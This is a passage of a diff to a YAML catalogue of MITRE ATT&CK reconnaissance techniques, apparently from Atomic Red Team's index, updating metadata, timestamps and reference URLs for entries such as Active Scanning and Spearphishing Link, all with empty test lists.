         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -55325,7 +56035,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55341,8 +56051,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -55364,7 +56072,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55380,8 +56088,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -55407,7 +56113,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55425,13 +56131,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55487,7 +56191,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -55538,7 +56242,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -55559,7 +56262,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55575,8 +56278,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -55598,7 +56299,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55614,8 +56315,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -55637,7 +56336,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55653,12 +56352,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55698,8 +56395,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -55744,11 +56441,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55788,9 +56484,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55852,7 +56547,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55878,7 +56572,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55899,8 +56593,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55965,7 +56657,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -56013,7 +56704,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -56035,7 +56725,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -56051,34 +56741,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56087,15 +56753,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -56117,7 +56806,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56133,8 +56822,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -56195,29 +56882,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -56226,15 +56894,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -56260,7 +56947,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -56278,47 +56965,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56327,19 +56977,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -56362,7 +57048,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56378,8 +57064,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -56405,7 +57089,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56421,8 +57105,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -56450,7 +57132,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56466,12 +57148,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56480,16 +57160,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56502,8 +57182,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
